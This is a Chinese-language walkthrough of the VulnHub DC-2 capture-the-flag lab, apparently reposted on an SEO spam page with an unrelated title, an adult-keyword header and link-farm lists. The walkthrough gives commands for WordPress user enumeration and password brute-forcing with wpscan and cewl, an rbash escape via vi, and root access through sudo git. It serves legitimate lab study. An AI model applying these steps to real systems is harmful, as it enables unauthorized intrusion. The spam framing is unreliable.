国产亚洲精品福利在线无卡一,国产精久久一区二区三区,亚洲精品无码国模,精品久久久久久无码专区不卡

當前位置: 首頁 > news >正文

深圳信科網(wǎng)站建設鄭州seo排名優(yōu)化

news 2025/7/5 3:21:14
深圳信科網(wǎng)站建設,鄭州seo排名優(yōu)化,天河做網(wǎng)站設計,網(wǎng)頁和網(wǎng)站有什么關系文章目錄一、環(huán)境搭建二、滲透流程三、思路總結(jié)一、環(huán)境搭建 DC-2下載地址:https://download.vulnhub.com/dc/DC-2.zip kali:192.168.144.148 DC-2:192.168.144.150 添加hosts文件:192.168.144.150 DC-2 二、滲透流程 nmap -A -…

文章目錄

    • 一、環(huán)境搭建
    • 二、滲透流程
    • 三、思路總結(jié)

一、環(huán)境搭建

DC-2下載地址:https://download.vulnhub.com/dc/DC-2.zip
kali:192.168.144.148
DC-2:192.168.144.150
添加hosts文件:192.168.144.150 DC-2
在這里插入圖片描述
在這里插入圖片描述

二、滲透流程

nmap -A -T5 -sV -sT -p- 192.168.144.150
開放端口:80(web)、 7744(ssh)
在這里插入圖片描述

訪問:192.168.144.150
在這里插入圖片描述
獲取到flag1
在這里插入圖片描述

flag1提示需要使用cewl進行暴力破解
進行目錄掃描,獲取到后臺登錄地址:http://dc-2/wp-admin
使用wpscan對wordpress用戶進行枚舉:wpscan --url http://dc-2 -e u
獲取到三個用戶:admin、jerry、tom
在這里插入圖片描述
利用cewl工具生成密碼字典:cewl http://dc-2 -w passwd.txt
在這里插入圖片描述
生成用戶字典:vim user1.txt
在這里插入圖片描述
使用wpscan進行爆破:wpscan --url http://dc-2 -U user1.txt -P passwd.txt
在這里插入圖片描述

獲取到了jerry:adipiscing、tom: parturient,登錄后臺
在這里插入圖片描述
獲取到flag2
在這里插入圖片描述

flag2提示,如果此路不通,嘗試另一種方法,嘗試7744端口ssh連接
tom登錄成功
在這里插入圖片描述

發(fā)現(xiàn)flag3
在這里插入圖片描述

rbash限制,cat無法執(zhí)行,vim無法執(zhí)行,vi可以執(zhí)行
在這里插入圖片描述
在這里插入圖片描述

flag3提示可以嘗試切換一下用戶
方法一:使用vi突破rbash
vi
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
su jerry
成功切換到jerry
在這里插入圖片描述

成功訪問到flag4在這里插入圖片描述

查看是否有可以提權(quán)的命令:find / -perm -u=s -type f 2>/dev/null
在這里插入圖片描述

sudo -l:發(fā)現(xiàn)git可以利用,flag4也提示了可以使用git
在這里插入圖片描述

sudo git help config:進入文本模式
!/bin/bash:獲取shell
在這里插入圖片描述

獲取最后的final-flag.txt
在這里插入圖片描述

三、思路總結(jié)

1、nmap端口掃描,添加hosts文件,訪問web頁面;
2、dirb目錄掃描獲取后臺登錄地址;
3、cewl暴力破解獲取后臺登錄賬戶;
4、ssh遠程連接;
5、vi突破rbash切換用戶;
6、git提權(quán);

參考鏈接:https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC2

http://m.aloenet.com.cn/news/39237.html

相關文章:

  • 學網(wǎng)站開發(fā)要多少錢微信公眾號推廣2元一個
  • 咨詢公司網(wǎng)站模板網(wǎng)絡品牌推廣
  • 天堂網(wǎng)長尾關鍵詞挖掘網(wǎng)站網(wǎng)頁設計與制作教程
  • 做公司網(wǎng)站需要注意什么昭通網(wǎng)站seo
  • wordpress下載主題demo北京網(wǎng)站優(yōu)化培訓
  • 網(wǎng)站建設培訓業(yè)務心得社群運營
  • 常州做網(wǎng)站多少錢網(wǎng)站推廣的作用在哪里
  • 做淘寶網(wǎng)站用什么軟件小升初最好的補課機構(gòu)排行榜
  • 網(wǎng)站開發(fā)教程免費知識付費小程序搭建
  • 網(wǎng)站設計網(wǎng)站維護電子商務網(wǎng)店運營推廣
  • 河源網(wǎng)站建設武漢百度推廣公司
  • 用代碼做網(wǎng)站鄭州百度seo
  • 調(diào)查網(wǎng)站賺錢市場營銷圖片高清
  • phpcms v9做網(wǎng)站電商運營基本知識
  • 網(wǎng)站頭像有啥做會清晰網(wǎng)站維護合同
  • 分類信息網(wǎng)站系統(tǒng)cms口碑營銷的優(yōu)缺點
  • 鲅魚圈做網(wǎng)站網(wǎng)工資頁多少錢一個月百度官方下載安裝
  • wordpress 做wiki手機優(yōu)化軟件排行
  • 網(wǎng)站開發(fā)流程書籍上海百網(wǎng)優(yōu)seo優(yōu)化公司
  • 武漢南亞建設監(jiān)理有限公司網(wǎng)站seo優(yōu)化的內(nèi)容有哪些
  • 蘭州做高端網(wǎng)站禁止搜索引擎收錄的方法
  • 網(wǎng)站怎么做dwcs6自己做網(wǎng)站的軟件
  • 網(wǎng)站怎樣設計網(wǎng)址深圳英文網(wǎng)站推廣
  • 杭州富陽網(wǎng)站建設公司現(xiàn)在如何進行網(wǎng)上推廣
  • 昆明網(wǎng)站搭建公司百度客服24小時電話人工服務
  • 郴州網(wǎng)上報名小學系統(tǒng)登錄某一網(wǎng)站seo策劃方案
  • ps網(wǎng)站輪播圖怎么做app軟件推廣平臺
  • php網(wǎng)站系統(tǒng)培訓機構(gòu)最新消息
  • 西寧做網(wǎng)站是什么網(wǎng)店如何推廣
  • 智能建站平臺z微信如何投放廣告